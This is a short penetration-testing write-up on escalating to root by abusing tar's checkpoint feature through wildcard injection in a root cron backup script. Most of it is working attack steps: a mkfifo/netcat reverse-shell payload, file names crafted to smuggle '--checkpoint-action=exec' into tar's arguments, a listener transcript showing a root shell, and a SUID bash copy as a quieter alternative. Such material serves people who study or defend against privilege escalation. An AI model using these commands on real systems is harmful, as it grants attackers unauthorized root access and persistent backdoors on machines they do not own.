Tar comes with a feature called “checkpoints” that allows periodic execution of actions at certain points of the archiving process. An example may be a large tar backup running on a cron job that periodically emails its progress after every 10,000th file as been archived. If that tar job is using a wildcard to backup a directory then we can inject our own checkpoint into the tar job that will execute our own code.
Exploit
You find this cron job running as super user every 5 minutes. The cron is utilising wildcards and the home/backups folder is writable. Perfect to insert a tar checkpoint.
-rw-r--r-- 1 root root 62 Oct 24 20:52 backup_files.sh
#!/bin/bash
cd /home/backups
tar cvf /tmp/backup_files.tar *
Steps
- Create Malicious payload.
echo -n "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f" > /home/backups/runme.sh
- Create the checkpoint.
touch /home/backups/--checkpoint=1
- The action to perform when the checkpoint is hit
touch /home/backups/--checkpoint-action=exec=sh\ runme.sh
Now the next time the cron runs the backup_files.sh script, the checkpoint will be hit and our runme.sh script will be run with the user privileges of backup_files.sh.
nc -lnvp 4444
listening on [any] 4444 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55592
# id
uid=0(root) gid=0(root) groups=0(root),141(kaboxer)
For a less noisy payload you can copy /bin/bash to tmp with suid bit set.
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > /home/backups/runme.sh